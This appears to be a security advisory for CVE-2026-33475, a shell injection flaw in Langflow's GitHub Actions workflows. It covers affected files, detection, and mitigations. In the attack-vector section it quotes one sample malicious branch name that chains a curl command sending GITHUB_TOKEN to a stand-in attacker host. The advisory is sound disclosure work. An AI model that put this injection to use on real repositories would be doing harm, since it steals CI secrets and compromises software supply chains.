CVE-2026-33475 Overview
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution.
Critical Impact
Unauthenticated attackers can achieve remote code execution in CI/CD pipelines, potentially exfiltrating secrets, tampering with releases, or compromising the software supply chain.
Affected Products
- Langflow versions prior to 1.9.0
- GitHub Actions workflows in .github/workflows/ directory
- GitHub Actions in .github/actions/ directory
Discovery Timeline
- 2026-03-24 - CVE-2026-33475 published to NVD
- 2026-03-24 - Last updated in NVD database
Technical Details for CVE-2026-33475
Vulnerability Analysis
This vulnerability is classified as CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), specifically manifesting as a shell injection vulnerability in GitHub Actions CI/CD workflows. The flaw enables unauthenticated remote code execution within the CI/CD environment, affecting any public fork of Langflow with GitHub Actions enabled.
The vulnerability allows attackers to inject and execute arbitrary shell commands during workflow execution. Successful exploitation can result in full access to CI secrets including GITHUB_TOKEN, the ability to push malicious tags or container images, tamper with software releases, or leak sensitive infrastructure data.
Root Cause
Several GitHub Actions workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands without proper sanitization. Variables such as github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values and must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection.
The affected files in Langflow 1.3.4 include:
- .github/actions/install-playwright/action.yml
- .github/workflows/deploy-docs-draft.yml
- .github/workflows/docker-build.yml
- .github/workflows/release_nightly.yml
- .github/workflows/python_test.yml
- .github/workflows/typescript_test.yml
Attack Vector
The attack is executed remotely over the network by exploiting the CI/CD pipeline. An attacker can fork the Langflow repository, create a branch with a malicious name containing shell commands (e.g., injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN), and open a pull request to the main branch. When GitHub Actions runs the affected workflow, the unsanitized branch name is interpolated into the shell command, causing the injected commands to execute. This allows the attacker to exfiltrate CI secrets via external HTTP requests or perform other malicious actions within the CI environment.
Detection Methods for CVE-2026-33475
Indicators of Compromise
- Unusual outbound HTTP requests from GitHub Actions runners to unknown external domains
- Unexpected branch names containing shell metacharacters such as &&, |, ;, or backticks in pull request events
- CI/CD workflow logs showing execution of commands not defined in the workflow files
- Unauthorized releases, tags, or container image pushes to package registries
Detection Strategies
- Audit GitHub Actions workflow files for direct interpolation of user-controlled variables (e.g., ${{ github.head_ref }}, ${{ github.event.pull_request.title }}) in run: steps
- Monitor GitHub Actions workflow execution logs for anomalous command patterns or unexpected network activity
- Implement branch name validation policies that reject names containing shell metacharacters
- Review pull requests from forks for suspicious branch naming patterns before allowing workflow execution
Monitoring Recommendations
- Enable GitHub Actions workflow audit logging and forward logs to SIEM for analysis
- Set up alerts for outbound network connections from CI runners to non-allowlisted domains
- Monitor for unexpected changes to release artifacts, container images, or published packages
- Review GitHub repository settings to ensure proper workflow approval requirements for fork pull requests
How to Mitigate CVE-2026-33475
Immediate Actions Required
- Upgrade Langflow to version 1.9.0 or later which contains the security patch
- Review and audit all GitHub Actions workflow files for unsafe variable interpolation patterns
- Enable workflow approval requirements for pull requests from repository forks
- Rotate any secrets that may have been exposed if exploitation is suspected
Patch Information
Version 1.9.0 of Langflow patches this vulnerability. For detailed information about the security fix, refer to the GitHub Security Advisory GHSA-87cc-65ph-2j4w.
Workarounds
- Refactor affected workflows to use environment variables instead of direct interpolation, wrapping values in double quotes
- Implement input validation for branch names and pull request titles before processing in workflows
- Restrict GitHub Actions from running on pull requests from forks until the patch is applied
- Apply the principle of least privilege to GITHUB_TOKEN permissions in workflow configurations
# Secure configuration example - use environment variables instead of direct interpolation
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
echo "Branch is: \"$BRANCH_NAME\""
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
